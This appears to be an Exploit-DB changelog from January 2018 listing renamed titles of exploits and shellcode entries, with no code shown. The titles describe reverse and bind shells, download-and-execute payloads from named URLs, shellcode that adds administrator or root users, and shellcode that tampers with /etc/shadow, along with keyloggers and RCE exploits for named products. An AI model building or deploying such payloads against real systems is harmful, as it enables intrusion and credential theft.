DB: 2018-01-19

58 changes to exploits/shellcodes

Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service

WebKit - 'WebCore::InputType::element' Use-After-Free
WebKit - 'WebCore::InputType::element' Use-After-Free (1)

WebKit - 'WebCore::InputType::element' Use-After-Free
WebKit - 'WebCore::InputType::element' Use-After-Free (2)
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (1)
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (2)

Rosoft Media Player 4.2.1 - Local Buffer Overflow
Rosoft Media Player 4.2.1 (Windows XP SP2/3 French) - Local Buffer Overflow

GNU Screen 4.5.0 - Local Privilege Escalation
GNU Screen 4.5.0 - Local Privilege Escalation (PoC)

glibc - 'getcwd()' Local Privilege Escalation

JAD java Decompiler 1.5.8e - Local Buffer Overflow
JAD Java Decompiler 1.5.8e - Local Buffer Overflow

JAD Java Decompiler 1.5.8e - Local Buffer Overflow
JAD Java Decompiler 1.5.8e - Local Buffer Overflow (NX Enabled)

Ability Server 2.34 - Remote APPE Buffer Overflow
Ability Server 2.34 - 'APPE' Remote Buffer Overflow

CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (1)

Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution
Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (1)

Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution
Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (2)

Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)

CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow
Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1)

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow
Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2)

Invision Power Board 2.0.3 - 'login.php' SQL Injection
Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)

FOSS Gallery Public 1.0 - Arbitrary File Upload
FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)

Vastal I-Tech Agent Zone - SQL Injection
Vastal I-Tech Agent Zone - 'view_listing.php' SQL Injection

Netsweeper 4.0.8 - Authentication Bypass
Netsweeper 4.0.8 - Authentication Bypass (via Disabling of IP Quarantine)

Netsweeper 4.0.8 - Authentication Bypass
Netsweeper 4.0.8 - Authentication Bypass (via New Profile Creation)

Primefaces 5.x - Remote Code Execution (Metasploit)

Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)

Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)

Vastal I-Tech Agent Zone - SQL Injection
Vastal I-Tech Agent Zone - 'searchCommercial.php' / 'searchResidential.php' SQL Injection

BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes)
BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)

FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes)
FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) + Null-Free Shellcode (65 bytes)

Linux/x86 - execve() Null-Free Shellcode (Generator)
Linux/x86 - execve() + Null-Free Shellcode (Generator)

Windows XP SP1 - Bind TCP Shell Shellcode (Generator)
Windows (XP SP1) - Bind TCP Shell Shellcode (Generator)

Linux/x86 - Command Generator Null-Free Shellcode (Generator)
Linux/x86 - Command Generator + Null-Free Shellcode (Generator)
(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)
Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)
Linux/x86 - HTTP/1.x Requests Shellcode (18+/26+ bytes) (Generator)
Windows/x86 - Multi-Format Encoding Tool Shellcode (Generator)
Linux/x86 - PUSH reboot() Shellcode (30 bytes)
Linux/x86 - Shellcode Obfuscator Null-Free (Generator)
Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)
Linux/x86 - reboot() + PUSH Shellcode (30 bytes)
Linux/x86 - Shellcode Obfuscator + Null-Free (Generator)
Linux/x86 - Reverse UDP (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes)

Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh_0_0) + Null-Free Shellcode (28 bytes)

Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)
Linux/x86 - Reverse TCP (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)

Linux/x86 - execve() Read Shellcode (92 bytes)
Linux/x86 - execve() + Read Shellcode (92 bytes)
Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)
Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)
Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() + Null-Free Shellcode (111+ bytes)
Linux/x86 - setreuid() + Executes Command Shellcode (49+ bytes)

Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes)
Linux/x86 - execve(/bin/sh) + Re-Use Of Strings In .rodata Shellcode (16 bytes)

Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)
Linux/x86 - execve() + Diassembly + Obfuscation Shellcode (32 bytes)

Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)
Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() + Null-Free Shellcode (236 bytes)
Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes)
Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) + XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) Shellcode + 1 Encoded (39 bytes)

Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes)
Linux/x86 - execve(/bin/sh) + Anti-Debug Trick (INT 3h trap) Shellcode (39 bytes)

Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)
Linux/x86 - Eject CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)

Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes)
Linux/x86 - (eax != 0 and edx == 0) + exit() Shellcode (4 bytes)

Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)
Linux/x86 - Snoop /dev/dsp + Null-Free Shellcode (172 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (45 bytes)

Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes)
Linux/x86 - Alphanumeric Encoded + IMUL Method Shellcode (88 bytes)

Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes)
Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)

Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)
Linux/x86 - Reverse TCP (200.182.207.235/TCP) Telnet Shel Shellcode (134 bytes)
Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) + XOR Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes)

Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes)

OSX/PPC - Reboot Shellcode (28 bytes)
OSX/PPC - Reboot() Shellcode (28 bytes)
Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)
Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)
Solaris/MIPS - Download File (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)
Solaris/SPARC - setreuid() + Executes Command Shellcode (92+ bytes)

Solaris/SPARC - setreuid + execve() Shellcode (56 bytes)
Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes)

Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes)
Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes)
Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode
Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)
Windows x86 - Egg Omelet SEH Shellcode
Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)
Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)
Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)
Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)
Windows x86 - Reverse Connection + Download A File + Save + Execute Shellcode
Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)
Windows x86 - Download File + Execute Shellcode (192 bytes)
Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)
Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)
Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)
Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)
Windows x86 - Command WinExec() Shellcode (104+ bytes)
Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)
Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)
Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)
Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)
Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)
Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode
Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)
Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode
Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes)
Windows/x86 - Egg Omelet SEH Shellcode
Windows/x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)
Windows/x86 - PEB!NtGlobalFlags Shellcode (14 bytes)
Windows/x86 (XP SP2) (French) - cmd.exe Shellcode (32 bytes)
Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)
Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)
Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + ASCII Printable Shellcode (49 bytes)
Windows/x86 - Reverse Connection + Download A File + Save + Execute Shellcode
Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)
Windows/x86 - Download File + Execute Shellcode (192 bytes)
Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)
Windows/x86 (NT/XP) - IsDebuggerPresent Shellcode (39 bytes)
Windows/x86 (SP1/SP2) - Beep Shellcode (35 bytes)
Windows/x86 (XP SP2) - MessageBox Shellcode (110 bytes)
Windows/x86 - Command WinExec() Shellcode (104+ bytes)
Windows/x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)
Windows (NT/2000/XP) (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)
Windows (9x/NT/2000/XP) - Reverse Generic Without Loader (192.168.1.11:4919) Shellcode (249 bytes)
Windows (9x/NT/2000/XP) - PEB method Shellcode (29 bytes)
Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)
Windows (9x/NT/2000/XP) - PEB method Shellcode (35 bytes)
Windows (XP/2000/2003) - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)
Windows (XP/2000/2003) - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)
Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode
Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)

Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)
Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)

Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)
Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes)

Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)
Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes)
Windows XP SP3 x86 - ShellExecuteA Shellcode
Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode
Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode
Windows/x86 (XP SP3) - ShellExecuteA Shellcode
Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode
Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode

Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)
Windows/x86 (XP SP2) - calc.exe Shellcode (45 bytes)

Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)
Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes)
Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)
Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)
Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)
Windows (XP Professional SP2) (English) - Wordpad + Null-Free Shellcode (12 bytes)

Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)
Windows/x86 (XP SP2) (French) - calc Shellcode (19 bytes)
Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)
Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)
Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes)
Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes)
Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)
Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)
Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes)
Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes)
Windows x86 - JITed Stage-0 Shellcode
Windows x86 - JITed exec notepad Shellcode
Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)
Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Windows - Egghunter JITed Stage-0 Shellcode
Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows x86 - MessageBox Shellcode (Metasploit)
Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode
Windows/x86 - JITed Stage-0 Shellcode
Windows/x86 - JITed exec notepad Shellcode
Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes)
Windows/x86 (XP SP2) - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode
Windows/x86 (XP SP3) (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows/x86 - MessageBox Shellcode (Metasploit)
Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode

Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2)
Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)

Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)
Linux/x86 - execve(a->/bin/sh) + Local-only Shellcode (14 bytes)

Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)
Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes)

Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode
Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode

Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)
Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)

Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)
Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)

Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)
Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)
Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes)
Windows 7 x64 - cmd Shellcode (61 bytes)
Linux/x86 - unlink /etc/shadow Shellcode (33 bytes)
Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)
Windows/x86-64 (7) - cmd Shellcode (61 bytes)
Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes)
Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)
Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)
Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)
Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode
Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)
Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) + Null-Free Shellcode

Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)
Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes)
Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes)
Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes)

Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)
Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)
Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)
Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode
Windows Mobile 6.5 TR - Phone Call Shellcode
Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)
Windows/x86 (XP SP3) (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)
Windows/ARM (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode
Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode
Windows/x86 (XP Professional SP3) (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows/x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)

Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode
Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode

Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode
Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode

Windows x86 - Eggsearch Shellcode (33 bytes)
Windows/x86 - Eggsearch Shellcode (33 bytes)

Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)
Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)
Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)
Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)
Windows/x86 (PerfectXp-pc1/SP3) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)
Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes)

Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode
Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode
Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)
Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)
Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)
Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)
Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)
Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)

Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode
Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode

Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)
Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)
Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode
Linux/x86 - Egghunter Shellcode (31 bytes)
Windows/ARM (RT) - Bind TCP (4444/TCP) Shell Shellcode
Linux/x86 - Egghunter (0x56767606) Using fstenv + Obfuscation Shellcode (31 bytes)
Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)
Windows - MessageBox Null-Free Shellcode (113 bytes)
Windows/x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)
Windows - MessageBox + Null-Free Shellcode (113 bytes)
Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)
Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)
Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)
Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)

Linux/x86 - rmdir Shellcode (37 bytes)
Linux/x86 - rmdir() Shellcode (37 bytes)
Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)
Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)

Windows XP x86-64 - Download File + Execute Shellcode (Generator)
Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)

Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)
Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)

Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes)
Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (40 bytes)

Linux/x86 - Egghunter Shellcode (20 bytes)
Linux/x86 - Egghunter (0x5159) Shellcode (20 bytes)
Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)
Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)
Linux/x86 - Create 'my.txt' In Working Directory Shellcode (37 bytes)
Linux/x86 - setreuid(0_ 0) + execve(/sbin/halt) + exit(0) Shellcode (49 bytes)
Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)
Windows XP SP3 x86 - Restart Shellcode (57 bytes)
Windows/x86 (XP SP3) - Create (file.txt) Shellcode (83 bytes)
Windows/x86 (XP SP3) - Restart Shellcode (57 bytes)

Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)

Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)
Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)

Linux/x86 - Reboot Shellcode (28 bytes)
Linux/x86 - Reboot() Shellcode (28 bytes)
Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode
Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)
Linux/x86 - Egghunter Shellcode (19 bytes)
Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode
Windows 2003 x64 - Token Stealing Shellcode (59 bytes)
OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes)
Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode
Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes)
Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes)
Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode
Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes)
OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)

Linux/x86-64 - Egghunter Shellcode (24 bytes)
Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes)

Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)
Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator)
Linux/x86-64 - Egghunter Shellcode (18 bytes)
Linux/x86 - Egghunter Shellcode (13 bytes)
Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes)
Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)
Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)

Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)
Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)

Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)
Windows .Net Framework x86 - Execute Native x86 Shellcode
Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)
Windows/x86 (.Net Framework) - Execute Native x86 Shellcode

Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)
